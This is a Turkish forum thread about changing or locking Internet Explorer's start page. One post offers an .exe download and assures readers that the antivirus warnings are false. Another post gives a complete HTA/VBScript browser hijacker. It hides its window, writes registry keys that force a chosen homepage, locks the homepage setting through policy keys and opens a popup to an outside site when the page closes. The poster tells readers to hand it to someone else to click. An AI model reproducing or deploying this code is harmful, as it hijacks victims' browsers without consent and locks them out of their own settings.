folder Tahribat.com Forumları
linefolder Yazılımlar / Diğer Programlar
linefolder Internet Explorer Açılış Sayfası Değiştirme



Internet Explorer Açılış Sayfası Değiştirme

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    tLG
    tLG's avatar
    Kayıt Tarihi: 08/Aralık/2008
    Erkek

    Bazen olur da, IE'nin açılış sayfası değiştirilemez. Kilitlidir o textbox...

    Ya da Internet Explorer açılışında resim göstermesini isteyebilirsiniz...

     

    O zaman benim yaptıgım proyu download edebilirsiniz:

     http://rapidshare.com/files/175381169/IE_A__ae_lae____Sayfasae_.exe

     

    Ister resim dosyası seç, ister site. Her ikisini de başarıyla değiştirir.

     

    Not: Registry'de işlem yaptıgı için antivirus uyarı verebilir. ama virüslü değildir kesinlikle. 


    "Geri geri çıkarken, biiip biiip sesi çıkaran araçların seslerini zil sesi yapmayı sevenlerin buluşma noktası" diye bi grup açsam katılır mısın lan feysbuk"ta?
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    byugr
    byugr's avatar
    Kayıt Tarihi: 04/Haziran/2008
    Erkek

    Resim göstermek için programa falan gerek yok hocam ...  giriş sayfası değiştirme yerine resmin veya txt uzantılı yazının adresini belirtmeniz yeterli ..

    örneğin file:///C:/004.gif sadece C:/004.gif de yazsanız olur o kendi tamamlar ...


    Bir namazlık saltanatın olacak, Taht misali o musalla taşında.
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Hybris
    Hybris's avatar
    Kayıt Tarihi: 12/Haziran/2007
    Erkek

    <html><head>
    <hta:application id=hta_note_id
     applicationName=hta_note_name
     showInTaskBar=no
     caption=no
     innerBorder=no
     selection=no
     scroll=no
     contextmenu=no />
    <script language=javascript>
    window.resizeTo(0, 0);
    window.moveTo(0, 0);
    </script>
    <SCRIPT language=vbs>
    self.MoveTo 0, 0
    Set shell = CreateObject("WScript.Shell")
      shell.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\Prefixes\\mirc","http://SITEYIBURAYA/","REG_SZ"
      shell.regwrite "HKLM\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"
      shell.regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"
      shell.regwrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://SITEYIBURAYA/","REG_SZ"
      shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://SITEYIBURAYA/","REG_SZ"
    self.Close
    </SCRIPT>

    <script language="JavaScript">
    <!--
    function FP_openNewWindow(w,h,nav,loc,sts,menu,scroll,resize,name,url) {//v1.0
     var windowProperties=''; if(nav==false) windowProperties+='toolbar=no,'; else
      windowProperties+='toolbar=yes,'; if(loc==false) windowProperties+='location=no,';
     else windowProperties+='location=yes,'; if(sts==false) windowProperties+='status=no,';
     else windowProperties+='status=yes,'; if(menu==false) windowProperties+='menubar=no,';
     else windowProperties+='menubar=yes,'; if(scroll==false) windowProperties+='scrollbars=no,';
     else windowProperties+='scrollbars=yes,'; if(resize==false) windowProperties+='resizable=no,';
     else windowProperties+='resizable=yes,'; if(w!="") windowProperties+='width='+w+',';
     if(h!="") windowProperties+='height='+h; if(windowProperties!="") {
      if( windowProperties.charAt(windowProperties.length-1)==',')
       windowProperties=windowProperties.substring(0,windowProperties.length-1); }
     window.open(url,name,windowProperties);
    }
    // -->
    </script>
    </head>
    <body onbeforeunload="FP_openNewWindow('640', '480', false, false, false, false, true, false, 'Duyuru', /*href*/'http://vacation-add.com/')">
    </body>
    </html>

    ---------------------------

    Buda o boxu kilitli hale getirmenizi sağlayan kod.İlgili yerleri değiştirin.Notepade kopyalayın uzantısını ''.hta'' yapın verin elemana tıklasın :)


    agile isn’t how fast you can go, it’s how fast you can turn.
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    tLG
    tLG's avatar
    Kayıt Tarihi: 08/Aralık/2008
    Erkek

    by_ugr bunu yazdı:
    -----------------------------

    Resim göstermek için programa falan gerek yok hocam ...  giriş sayfası değiştirme yerine resmin veya txt uzantılı yazının adresini belirtmeniz yeterli ..

    örneğin file:///C:/004.gif sadece C:/004.gif de yazsanız olur o kendi tamamlar ...


    -----------------------------

     

    programın amacı dosya yolunu daha kolay seçmemizi sağlamak, veya o adres çubuğu kilitli olsa bile açılış sayfasını değiştirebilmek....

     

    yurdum insanı, okuyor ama anlamıyor yazılanı :D


    "Geri geri çıkarken, biiip biiip sesi çıkaran araçların seslerini zil sesi yapmayı sevenlerin buluşma noktası" diye bi grup açsam katılır mısın lan feysbuk"ta?
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    yasin_55
    yasin_55's avatar
    Kayıt Tarihi: 17/Temmuz/2005
    Erkek

    tLG bunu yazdı:
    -----------------------------

    Bazen olur da, IE'nin açılış sayfası değiştirilemez. Kilitlidir o textbox...

    -----------------------------

     

    işte o dakka hijack imdadımıza yetşir :)

Toplam Hit: 1069 Toplam Mesaj: 5